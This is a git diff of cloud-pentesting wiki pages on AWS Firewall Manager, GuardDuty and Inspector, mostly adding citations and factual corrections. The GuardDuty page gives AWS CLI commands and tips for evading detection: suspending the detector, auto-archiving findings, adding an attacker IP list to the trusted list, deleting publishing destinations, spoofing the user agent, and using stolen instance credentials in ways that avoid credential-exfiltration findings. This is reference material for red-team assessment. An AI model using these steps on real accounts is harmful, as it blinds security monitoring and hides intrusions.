 
 ### `fms:TagResource`, `fms:UntagResource`
 
-An attacker would be able to add, modify, or remove tags from Firewall Manager resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
+An attacker would be able to add, modify, or remove tags from Firewall Manager resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.<sup>[[2]](#references)</sup>
 
 ```bash
 aws fms tag-resource --resource-arn <value> --tag-list <value>
@@ -302,12 +312,36 @@ aws fms untag-resource --resource-arn <value> --tag-keys <value>
 
 ## References
 
-- [https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html)
-- [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html)
-- [https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html](https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html)
+- [1] [AWS Firewall Manager in AWS GovCloud (US)](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html)
+- [2] [Actions, resources, and condition keys for AWS Firewall Manager](https://docs.aws.amazon.com/service-authorization/latest/reference/list_fms.html)
+- [3] [AWS Firewall Manager](https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html)
+- [4] [What are AWS WAF, AWS Shield Advanced, AWS Shield network security director and AWS Firewall Manager?](https://docs.aws.amazon.com/waf/latest/developerguide/what-is-aws-waf.html)
+- [5] [Using AWS Firewall Manager policies](https://docs.aws.amazon.com/waf/latest/developerguide/working-with-policies.html)
+- [6] [AWS Firewall Manager prerequisites](https://docs.aws.amazon.com/waf/latest/developerguide/fms-prereq.html)
+- [7] [Joining and configuring AWS Organizations for using Firewall Manager](https://docs.aws.amazon.com/waf/latest/developerguide/join-aws-orgs.html)
+- [8] [Creating an AWS Firewall Manager default administrator account](https://docs.aws.amazon.com/waf/latest/developerguide/enable-integration.html)
+- [9] [Enabling AWS Config for using Firewall Manager](https://docs.aws.amazon.com/waf/latest/developerguide/enable-config.html)
+- [10] [Using Firewall Manager managed lists](https://docs.aws.amazon.com/waf/latest/developerguide/working-with-managed-lists.html)
+- [11] [Using AWS Firewall Manager administrators](https://docs.aws.amazon.com/waf/latest/developerguide/fms-administrators.html)
+- [12] [Changing the default Firewall Manager administrator account](https://docs.aws.amazon.com/waf/latest/developerguide/fms-change-administrator.html)
+- [13] [Creating a Firewall Manager administrator account](https://docs.aws.amazon.com/waf/latest/developerguide/fms-creating-administrators.html)
+- [14] [Setting up AWS Firewall Manager AWS WAF policies](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html)
+- [15] [AWS CLI Command Reference for Firewall Manager](https://docs.aws.amazon.com/cli/latest/reference/fms/)
+- [16] [PutAdminAccount - AWS Firewall Manager](https://docs.aws.amazon.com/fms/2018-01-01/APIReference/API_PutAdminAccount.html)
+- [17] [Creating an AWS Firewall Manager policy](https://docs.aws.amazon.com/waf/latest/developerguide/create-policy.html)
+- [18] [Using common security group policies with Firewall Manager](https://docs.aws.amazon.com/waf/latest/developerguide/security-group-policies-common.html)
+- [19] [How AWS Firewall Manager works with IAM](https://docs.aws.amazon.com/waf/latest/developerguide/fms-security_iam_service-with-iam.html)
+- [20] [put-notification-channel - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/fms/put-notification-channel.html)
+- [21] [PutNotificationChannel - AWS Firewall Manager](https://docs.aws.amazon.com/fms/2018-01-01/APIReference/API_PutNotificationChannel.html)
+- [22] [Using the AWS Firewall Manager policy scope](https://docs.aws.amazon.com/waf/latest/developerguide/policy-scope.html)
+- [23] [Using AWS Network Firewall policies in Firewall Manager](https://docs.aws.amazon.com/waf/latest/developerguide/network-firewall-policies.html)
+- [24] [list-discovered-resources - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/fms/list-discovered-resources.html)
+- [25] [ReadOnlyAccess - AWS Managed Policy](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/ReadOnlyAccess.html)
+- [26] [put-protocols-list - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/fms/put-protocols-list.html)
+- [27] [put-policy - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/fms/put-policy.html)
+- [28] [delete-policy - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/fms/delete-policy.html)
+- [29] [SecurityServicePolicyData - AWS Firewall Manager](https://docs.aws.amazon.com/fms/2018-01-01/APIReference/API_SecurityServicePolicyData.html)
+- [30] [Migrating your AWS WAF Classic resources to AWS WAF](https://docs.aws.amazon.com/waf/latest/developerguide/waf-migrating-from-classic.html)
+- [31] [Actions, resources, and condition keys for AWS Firewall Manager - legacy URL](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
@@ -1,20 +1,19 @@
 # AWS - GuardDuty Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## GuardDuty
 
-According to the [**docs**](https://aws.amazon.com/guardduty/features/): GuardDuty combines **machine learning, anomaly detection, network monitoring, and malicious file discovery**, using both AWS and industry-leading third-party sources to help protect workloads and data on AWS. GuardDuty is capable of analysing tens of billions of events across multiple AWS data sources, such as AWS CloudTrail event logs, Amazon Virtual Private Cloud (VPC) Flow Logs, Amazon Elastic Kubernetes Service (EKS) audit and system-level logs, and DNS query logs.
+According to the [**docs**](https://aws.amazon.com/guardduty/features/), GuardDuty combines **machine learning, anomaly detection, network monitoring, and malicious file discovery**, using both AWS and industry-leading third-party sources to help protect workloads and data on AWS. GuardDuty can analyze tens of billions of events across multiple AWS data sources, such as AWS CloudTrail event logs, Amazon Virtual Private Cloud (VPC) Flow Logs, Amazon Elastic Kubernetes Service (EKS) audit and system-level logs, and DNS query logs.<sup>[[9]](#references)</sup>
 
-Amazon GuardDuty **identifies unusual activity within your accounts**, analyses the **security relevanc**e of the activity, and gives the **context** in which it was invoked. This allows a responder to determine if they should spend time on further investigation.
+Amazon GuardDuty **identifies unusual activity within your accounts**, analyzes the **security relevance** of the activity, and gives the **context** in which it was invoked. This allows a responder to determine if they should spend time on further investigation.<sup>[[9]](#references)</sup>
 
-Alerts **appear in the GuardDuty console (90 days)** and CloudWatch Events.
+Findings remain available in the GuardDuty console for **90 days** and are published to Amazon EventBridge (formerly CloudWatch Events).<sup>[[10]](#references)[[21]](#references)</sup>
 
 > [!WARNING]
-> When a user **disable GuardDuty**, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the **existing findings will be lost**.\
-> If you just stop it, the existing findings will remain.
+> When a user **disables GuardDuty**, it stops monitoring your AWS environment and generating new findings. Disabling it also permanently loses the existing findings and configuration, whereas suspending it preserves existing findings.<sup>[[11]](#references)</sup>
 
 ### Findings Example
+
+GuardDuty documents examples across the following finding categories.<sup>[[9]](#references)</sup>
 
 - **Reconnaissance**: Activity suggesting reconnaissance by an attacker, such as **unusual API activity**, suspicious database **login** attempts, intra-VPC **port scanning**, unusual failed login request patterns, or unblocked port probing from a known bad IP.
 - **Instance compromise**: Activity indicating an instance compromise, such as **cryptocurrency mining, backdoor command and control (C\&C)** activity, malware using domain generation algorithms (DGA), outbound denial of service activity, unusually **high network** traffic volume, unusual network protocols, outbound instance communication with a known malicious IP, temporary Amazon EC2 credentials used by an external IP address, and data exfiltration using DNS.
@@ -25,40 +24,40 @@ Alerts **appear in the GuardDuty console (90 days)** and CloudWatch Events.
 
 <summary>Finding Information</summary>
 
-Finding summary:
+Finding summary:<sup>[[12]](#references)[[13]](#references)</sup>
 
 - Finding type
-- Severity: 7-8.9 High, 4-6.9 Medium, 01-3.9 Low
+- Severity: 9-10 Critical, 7-8.9 High, 4-6.9 Medium, 1-3.9 Low
 - Region
 - Account ID
 - Resource ID
-- Time of detection
+- Created/updated time
 - Which threat list was used
 
-The body has this information:
+The body has this information:<sup>[[12]](#references)</sup>
 
 - Resource affected
 - Action
-- Actor: Ip address, port and domain
+- Actor: IP address, port, and domain
 - Additional Information
 
 </details>
 
 ### All Findings
 
-Access a list of all the GuardDuty findings in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html)
+Access a list of all the GuardDuty findings in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html).<sup>[[1]](#references)</sup>
 
 ### Multi Accounts
 
 #### By Invitation
 
-You can **invite other accounts** to a different AWS GuardDuty account so **every account is monitored from the same GuardDuty**. The master account must invite the member accounts and then the representative of the member account must accept the invitation.
+You can **invite other accounts** to a different AWS GuardDuty account so **every account is monitored from the same GuardDuty**. The administrator account must invite the member accounts, and then a representative of each member account must accept the invitation.<sup>[[14]](#references)</sup>
 
 #### Via Organization
 
-You can designate any account within the organization to be the **GuardDuty delegated administrator**. Only the organization management account can designate a delegated administrator.
+You can designate any account within the organization to be the **GuardDuty delegated administrator**. Only the organization management account can designate a delegated administrator.<sup>[[15]](#references)</sup>
 
-An account that gets designated as a delegated administrator becomes a GuardDuty administrator account, has GuardDuty enabled automatically in the designated AWS Region, and also has the **permission to enable and manage GuardDuty for all of the accounts in the organization within that Region**. The other accounts in the organization can be viewed and added as GuardDuty member accounts associated with this delegated administrator account.
+An account that gets designated as a delegated administrator becomes a GuardDuty administrator account, has GuardDuty enabled automatically in the designated AWS Region, and also has the **permission to enable and manage GuardDuty for all of the accounts in the organization within that Region**. The other accounts in the organization can be viewed and added as GuardDuty member accounts associated with this delegated administrator account.<sup>[[15]](#references)</sup>
 
 ## Enumeration
 
@@ -124,7 +123,7 @@ With this information, recreate as much as possible the same scenario to use the
 
 #### `guardduty:UpdateDetector`
 
-With this permission you could disable GuardDuty to avoid triggering alerts.
+With this permission you can suspend GuardDuty monitoring to stop new findings from being generated while preserving the detector and existing findings.<sup>[[11]](#references)[[16]](#references)</sup>
 
 ```bash
 aws guardduty update-detector --detector-id <detector-id> --no-enable
@@ -133,7 +132,7 @@ aws guardduty update-detector --detector-id <detector-id> --data-sources S3Logs=
 
 #### `guardduty:CreateFilter`
 
-Attackers with this permission have the capability to **employ filters for the automatic** archiving of findings:
+Attackers with this permission have the capability to **employ filters for the automatic** archiving of findings.<sup>[[2]](#references)[[17]](#references)</sup>
 
 ```bash
 aws guardduty create-filter  --detector-id <detector-id> --name <filter-name> --finding-criteria file:///tmp/criteria.json --action ARCHIVE
@@ -141,7 +140,7 @@ aws guardduty create-filter  --detector-id <detector-id> --name <filter-name> --
 
 #### `iam:PutRolePolicy`, (`guardduty:CreateIPSet`|`guardduty:UpdateIPSet`)
 
-Attackers with the previous privileges could modify GuardDuty's [**Trusted IP list**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) by adding their IP address to it and avoid generating alerts.
+Attackers with the previous privileges could modify GuardDuty's [**Trusted IP list**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) by adding their IP address and avoid generating findings for activity associated with that trusted source.<sup>[[3]](#references)</sup>
 
 ```bash
 aws guardduty update-ip-set --detector-id <detector-id> --activate --ip-set-id <ip-set-id> --location https://some-bucket.s3-eu-west-1.amazonaws.com/attacker.csv
@@ -149,49 +148,58 @@ aws guardduty update-ip-set --detector-id <detector-id> --activate --ip-set-id <
 
 #### `guardduty:DeletePublishingDestination`
 
-Attackers could remove the destination to prevent alerting:
+Attackers could remove the destination to prevent alerting.<sup>[[4]](#references)[[19]](#references)</sup>
 
 ```bash
 aws guardduty delete-publishing-destination --detector-id <detector-id> --destination-id <dest-id>
 ```
 
 > [!CAUTION]
-> Deleting this publishing destination will **not affect the generation or visibility of findings within the GuardDuty console**. GuardDuty will continue to analyze events in your AWS environment, identify suspicious or unexpected behavior, and generate findings.
+> Deleting this publishing destination only removes the export definition; it does **not affect the generation or visibility of findings within the GuardDuty console**. GuardDuty will continue to analyze events in your AWS environment, identify suspicious or unexpected behavior, and generate findings.<sup>[[4]](#references)[[9]](#references)[[19]](#references)</sup>
 
 ### Specific Findings Bypass Examples
 
-Note that there are tens of GuardDuty findings, however, **as Red Teamer not all of them will affect you**, and what is better, you have the f**ull documentation of each of them** in [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) so take a look before doing any action to not get caught.
+Note that there are many GuardDuty findings, but **not all of them will affect every red-team action**. The [full documentation of the finding types](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) can help you assess relevant detections before taking action.<sup>[[1]](#references)</sup>
 
 Here you have a couple of examples of specific GuardDuty findings bypasses:
 
 #### [PenTest:IAMUser/KaliLinux](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux) <a href="#pentest-iam-kalilinux" id="pentest-iam-kalilinux"></a>
 
-GuardDuty detect AWS API requests from common penetration testing tools and trigger a [PenTest Finding](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux).\
-It's detected by the **user agent name** that is passed in the API request.\
-Therefore, **modifying the user agent** it's possible to prevent GuardDuty from detecting the attack.
+GuardDuty documents this finding when an API is invoked from a Kali Linux machine.<sup>[[20]](#references)</sup>
 
-To prevent this you can search from the script `session.py` in the `botocore` package and modify the user agent, or set Burp Suite as the AWS CLI proxy and change the user-agent with the MitM or just use an OS like Ubuntu, Mac or Windows will prevent this alert from triggering.
+GuardDuty includes the API request's **user agent** in finding details, and botocore constructs its default user agent with the platform name and release. Changing that client-controlled value may avoid this specific OS-identification finding (an inference), but it does not bypass other GuardDuty detections.<sup>[[12]](#references)[[18]](#references)</sup>
+
+For an assessment, you can modify `session.py` in the `botocore` package, rewrite the user agent through a proxy, or use a non-Kali operating system. Test the result in a controlled environment because changing the user agent does not suppress network, DNS, or anomalous-behavior findings.
 
 #### UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration
 
-Extracting EC2 credentials from the metadata service and **utilizing them outside** the AWS environment activates the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) alert. Conversely, employing these credentials from your EC2 instance triggers the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) alert. Yet, **using the credentials on another compromised EC2 instance within the same account goes undetected**, raising no alert.
+Using temporary EC2 instance credentials from an external IP can activate the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) finding. Using those credentials from another AWS account can activate the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) finding.<sup>[[6]](#references)[[7]](#references)</sup>
 
 > [!TIP]
-> Therefore, **use the exfiltrated credentials from inside the machine** where you found them to not trigger this alert.
+> Based on these documented conditions, keeping credentials on the source instance avoids these two credential-exfiltration findings, but it is not a general GuardDuty bypass; other findings can still be generated.<sup>[[1]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ## References
 
-- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html)
-- [https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html](https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html)
-- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html)
-- [https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html](https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html)
-- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-ec2.html#unauthorizedaccess-ec2-torclient](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-ec2.html#unauthorizedaccess-ec2-torclient)
-- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws)
-- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws)
-- [https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html](https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html)
+- [1] [GuardDuty finding types](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html)
+- [2] [Suppression rules in GuardDuty](https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html)
+- [3] [Customizing threat detection with entity lists and IP address lists](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html)
+- [4] [delete-publishing-destination — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html)
+- [5] [GuardDuty EC2 finding types](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-ec2.html#unauthorizedaccess-ec2-torclient)
+- [6] [GuardDuty IAM finding types — InstanceCredentialExfiltration.OutsideAWS](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws)
+- [7] [GuardDuty IAM finding types — InstanceCredentialExfiltration.InsideAWS](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws)
+- [8] [Access an AWS service using an interface VPC endpoint](https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html)
+- [9] [Amazon GuardDuty features](https://aws.amazon.com/guardduty/features/)
+- [10] [Processing GuardDuty findings with Amazon EventBridge](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_findings_eventbridge.html)
+- [11] [Suspending or disabling GuardDuty](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_suspend-disable.html)
+- [12] [Finding details](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_findings-summary.html)
+- [13] [Severity levels of GuardDuty findings](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_findings-severity.html)
+- [14] [Managing GuardDuty accounts by invitation](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_invitations.html)
+- [15] [Managing GuardDuty accounts with AWS Organizations](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_organizations.html)
+- [16] [update-detector — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/guardduty/update-detector.html)
+- [17] [create-filter — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/guardduty/create-filter.html)
+- [18] [botocore session.py](https://github.com/boto/botocore/blob/develop/botocore/session.py)
+- [19] [Understanding and generating Amazon GuardDuty findings](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_findings.html)
+- [20] [GuardDuty IAM finding types — PenTest:IAMUser/KaliLinux](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux)
+- [21] [Amazon GuardDuty FAQs](https://aws.amazon.com/guardduty/faqs/)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
@@ -1,57 +1,54 @@
 # AWS - Inspector Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
-
 ## Inspector
 
-Amazon Inspector is an advanced, automated vulnerability management service designed to enhance the security of your AWS environment. This service continuously scans Amazon EC2 instances, container images in Amazon ECR, Amazon ECS, and AWS Lambda functions for vulnerabilities and unintended network exposure. By leveraging a robust vulnerability intelligence database, Amazon Inspector provides detailed findings, including severity levels and remediation recommendations, helping organizations proactively identify and address security risks. This comprehensive approach ensures a fortified security posture across various AWS services, aiding in compliance and risk management.
+Amazon Inspector is a vulnerability management service that automatically discovers workloads and continually scans Amazon EC2 instances, container images in Amazon ECR, and AWS Lambda functions for software vulnerabilities and unintended network exposure. It can also map ECR images to running Amazon ECS containers. Inspector creates findings with severity ratings, affected-resource details, and remediation information.<sup>[[1]](#references)[[3]](#references)[[11]](#references)</sup>
 
 ### Key elements
 
 #### Findings
 
-Findings in Amazon Inspector are detailed reports about vulnerabilities and exposures discovered during the scan of EC2 instances, ECR repositories, or Lambda functions. Based on its state, findings are categorized as:
+Findings in Amazon Inspector are detailed reports about vulnerabilities and exposures discovered during scans of EC2 instances, ECR container images, or Lambda functions. Based on their state, findings are categorized as follows.<sup>[[3]](#references)</sup>
 
 - **Active**: The finding has not been remediated.
 - **Closed**: The finding has been remediated.
 - **Suppressed**: The finding has been marked with this state due to one or more **suppression rules**.
 
-Findings are also categorized into the next three types:
+Findings are also categorized into the following three types.<sup>[[4]](#references)</sup>
 
-- **Package**: These findings relate to vulnerabilities in software packages installed on your resources. Examples include outdated libraries or dependencies with known security issues.
-- **Code**: This category includes vulnerabilities found in the code of applications running on your AWS resources. Common issues are coding errors or insecure practices that could lead to security breaches.
-- **Network**: Network findings identify potential exposures in network configurations that could be exploited by attackers. These include open ports, insecure network protocols, and misconfigured security groups.
+- **Package**: These findings relate to software packages exposed to known vulnerabilities, such as outdated libraries or dependencies.
+- **Code**: This category includes vulnerabilities found in application code, such as missing encryption, data leaks, injection flaws, and weak cryptography.
+- **Network**: Network findings identify open network paths to EC2 instances, including paths caused by overly permissive security groups or other network configuration.
 
 #### Filters and Suppression Rules
 
-Filters and suppression rules in Amazon Inspector help manage and prioritize findings. Filters allow you to refine findings based on specific criteria, such as severity or resource type. Suppression rules allow you to suppress certain findings that are considered low risk, have already been mitigated, or for any other important reason, preventing them from overloading your security reports and allowing you to focus on more critical issues.
+Filters and suppression rules in Amazon Inspector help manage and prioritize findings. Filters refine the findings view using criteria such as severity or resource type, while suppression rules hide matching findings from the default view without closing or remediating them.<sup>[[5]](#references)[[6]](#references)</sup>
 
 #### Software Bill of Materials (SBOM)
 
-A Software Bill of Materials (SBOM) in Amazon Inspector is an exportable nested inventory list detailing all the components within a software package, including libraries and dependencies. SBOMs help provide transparency into the software supply chain, enabling better vulnerability management and compliance. They are crucial for identifying and mitigating risks associated with open source and third-party software components.
+A Software Bill of Materials (SBOM) in Amazon Inspector is a nested inventory of open-source and third-party software components. Amazon Inspector can generate and export SBOMs for supported monitored resources, including in CycloneDX 1.4 or SPDX 2.3 JSON formats.<sup>[[8]](#references)</sup>
 
 ### Key features
 
 #### Export findings
 
-Amazon Inspector offers the capability to export findings to Amazon S3 Buckets, Amazon EventBridge and AWS Security Hub, which enables you to generate detailed reports of identified vulnerabilities and exposures for further analysis or sharing at a specific date and time. This feature supports various output formats such as CSV and JSON, making it easier to integrate with other tools and systems. The export functionality allows customization of the data included in the reports, enabling you to filter findings based on specific criteria like severity, resource type, or date range and including by default all of your findings in the current AWS Region with an Active status.
+Amazon Inspector findings reports are CSV or JSON snapshots exported to Amazon S3. Separately, Inspector publishes findings to Amazon EventBridge and AWS Security Hub CSPM. Filters customize a report's contents; without a filter, it contains all findings in the current AWS Region with an Active status.<sup>[[1]](#references)[[7]](#references)</sup>
 
-When exporting findings, a Key Management Service (KMS) key is necessary to encrypt the data during export. KMS keys ensure that the exported findings are protected against unauthorized access, providing an extra layer of security for sensitive vulnerability information.
+When exporting findings, Amazon Inspector encrypts the report with a specified AWS KMS key before storing it in S3; the KMS key and bucket must allow Amazon Inspector to use them and be in the same AWS Region.<sup>[[7]](#references)</sup>
 
 #### Amazon EC2 instances scanning
 
-Amazon Inspector offers robust scanning capabilities for Amazon EC2 instances to detect vulnerabilities and security issues. Inspector compared extracted metadata from the EC2 instance against rules from security advisories in order to produce package vulnerabilities and network reachability issues. These scans can be performed through **agent-based** or **agentless** methods, depending on the **scan mode** settings configuration of your account.
+Amazon Inspector extracts metadata from EC2 instances and compares it with rules from security advisories to produce package-vulnerability and network-reachability findings. Package scans can use **agent-based** or **agentless** methods, depending on the account's **scan mode**.<sup>[[9]](#references)</sup>
 
-- **Agent-Based**: Utilizes the AWS Systems Manager (SSM) agent to perform in-depth scans. This method allows for comprehensive data collection and analysis directly from the instance.
-- **Agentless**: Provides a lightweight alternative that does not require installing an agent on the instance, creating an EBS snapshot of every volume of the EC2 instance, looking for vulnerabilities, and then deleting it; leveraging existing AWS infrastructure for scanning.
+- **Agent-Based**: Uses the AWS Systems Manager (SSM) agent to collect software inventory from the instance.<sup>[[9]](#references)</sup>
+- **Agentless**: Uses EBS snapshots of every attached volume to collect inventory and then deletes the snapshots after scanning; it does not require an agent on the instance.<sup>[[9]](#references)</sup>
 
 The scan mode determines which method will be used to perform EC2 scans:
 
-- **Agent-Based**: Involves installing the SSM agent on EC2 instances for deep inspection.
-- **Hybrid Scanning**: Combines both agent-based and agentless methods to maximize coverage and minimize performance impact. In those EC2 instances where the SSM agent is installed, Inspector will perform an agent-based scan, and for those where there is no SSM agent, the scan performed will be agentless.
+- **Agent-Based**: Uses the agent-based method exclusively for eligible SSM-managed instances.<sup>[[9]](#references)</sup>
+- **Hybrid Scanning**: Combines both methods. Eligible instances managed by SSM use agent-based scanning; eligible EBS-backed instances without SSM management use agentless scanning.<sup>[[9]](#references)</sup>
 
-Another important feature is the **deep inspection** for EC2 Linux instances. This feature offers thorough analysis of the software and configuration of EC2 Linux instances, providing detailed vulnerability assessments, including operating system vulnerabilities, application vulnerabilities, and misconfigurations, ensuring a comprehensive security evaluation. This is achieved through the inspection of **custom paths** and all of its sub-directories. By default, Amazon Inspector will scan the following, but each member account can define up to 5 more custom paths, and each delegated administrator up to 10:
+For Linux EC2 instances, **deep inspection** extends package-vulnerability scanning to application-language packages through the Amazon Inspector SSM plugin. It scans configured **custom paths** and all their sub-directories; each account can define up to 5 custom paths, and a delegated administrator can define 10.<sup>[[10]](#references)</sup>
 
 - `/usr/lib`
 - `/usr/lib64`
@@ -60,32 +57,36 @@ Another important feature is the **deep inspection** for EC2 Linux instances. Th
 
 #### Amazon ECR container images scanning
 
-Amazon Inspector provides robust scanning capabilities for Amazon Elastic Container Registry (ECR) container images, ensuring that package vulnerabilities are detected and managed efficiently.
+Amazon Inspector scans container images stored in Amazon ECR for software vulnerabilities and generates package-vulnerability findings.<sup>[[11]](#references)</sup>
 
-- **Basic Scanning**: This is a quick and lightweight scan that identifies known OS packages vulnerabilities in container images using a standard set of rules from the open-source Clair project. With this scanning configuration, your repositories will be scanned on push, or performing manual scans.
-- **Enhanced Scanning**: This option adds the continuous scanning feature in addition to the on push scan. Enhanced scanning dives deeper into the layers of each container image to identify vulnerabilities in OS packages and in programming languages packages with higher accuracy. It analyzes both the base image and any additional layers, providing a comprehensive view of potential security issues.
+Amazon ECR exposes the following scanning modes; Amazon Inspector supplies enhanced scanning, while basic scanning is ECR's native scanner.<sup>[[11]](#references)</sup>
+
+- **Basic Scanning**: Repositories can be scanned on push or manually for operating-system package vulnerabilities.
+- **Enhanced Scanning**: Amazon Inspector scans for operating-system and programming-language package vulnerabilities at the registry level, with on-push or continuous scanning.
 
 #### Amazon Lambda functions scanning
 
-Amazon Inspector includes comprehensive scanning capabilities for AWS Lambda functions and its layers, ensuring the security and integrity of serverless applications. Inspector offers two types of scanning for Lambda functions:
+Amazon Inspector provides continuous vulnerability assessments for AWS Lambda functions and layers through two scan types.<sup>[[12]](#references)</sup>
 
-- **Lambda standard scanning**: This default feature identifies software vulnerabilities in the application package dependencies added to your Lambda function and layers. For instance, if your function uses a version of a library like python-jwt with a known vulnerability, it generates a finding.
-- **Lambda code scanning**: Analyzes custom application code for security issues, detecting vulnerabilities like injection flaws, data leaks, weak cryptography, and missing encryption. It captures code snippets highlighting detected vulnerabilities, such as hardcoded credentials. Findings include detailed remediation suggestions and code snippets for fixing the issues.
+- **Lambda standard scanning**: The default scan type identifies package vulnerabilities in application dependencies in functions and layers. For example, a vulnerable dependency such as a version of `python-jwt` would produce a finding.<sup>[[12]](#references)</sup>
+- **Lambda code scanning**: Analyzes custom application code for issues such as injection flaws, data leaks, weak cryptography, and missing encryption. Findings include code snippets and remediation suggestions.<sup>[[13]](#references)</sup>
 
 #### **Center for Internet Security (CIS) scans**
 
-Amazon Inspector includes CIS scans to benchmark Amazon EC2 instance operating systems against best practice recommendations from the Center for Internet Security (CIS). These scans ensure configurations adhere to industry-standard security baselines.
+Amazon Inspector CIS scans benchmark Amazon EC2 instance operating systems against best-practice recommendations from the Center for Internet Security (CIS).<sup>[[14]](#references)</sup>
 
